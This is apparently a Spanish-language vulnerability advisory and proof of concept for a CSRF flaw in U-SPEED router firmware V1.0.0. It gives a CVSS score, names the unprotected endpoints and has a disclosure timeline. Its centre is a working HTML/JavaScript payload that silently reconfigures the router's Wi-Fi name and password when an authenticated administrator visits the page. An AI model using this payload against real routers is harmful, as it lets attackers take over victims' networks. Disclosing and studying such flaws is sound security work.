
Prueba de concepto de exploit para CVE-2026-36960, una vulnerabilidad CSRF en el firmware del router U-SPEED que permite cambios de configuración no autorizados mediante solicitudes falsificadas.
ID CVE: CVE-2026-36960 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Fabricante: U-SPEED Producto: Router U-SPEED Versión de Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
El firmware V1.0.0 del Router U-SPEED no implementa mecanismos de protección CSRF, como tokens anti-CSRF o validación estricta de los encabezados Origin/Referer para los endpoints administrativos de la API. Un atacante puede crear una página web maliciosa que envíe solicitudes HTTP falsificadas a los endpoints de configuración. Si un administrador autenticado visita la página web maliciosa, el router procesa la solicitud como una acción administrativa legítima.
Puntuación CVSS v3.1: 8.8 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Métrica | Valor |
|---|
| Vector de Ataque | Red |
| Complejidad de Ataque | Baja |
| Privilegios Requeridos | Ninguno |
| Interacción del Usuario | Requerida |
| Impacto de Confidencialidad | Alto |
| Impacto de Integridad | Alto |
| Impacto de Disponibilidad | Alto |
| Endpoint | Función |
|---|---|
/api/setWlan | Configuración de red inalámbrica |
/api/telnet | Configuración del servicio Telnet |
| Otros endpoints de configuración | Diversas funciones administrativas |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportamiento Esperado: La solicitud debería ser rechazada por falta de token CSRF. Comportamiento Real: El router acepta y procesa la solicitud falsificada.
| Fecha | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidad descubierta |
| 2026-04-29 | Reportada a MITRE |
| 2026-04-29 | CVE-2026-36960 asignado |
| 2026-04-29 | Divulgación pública |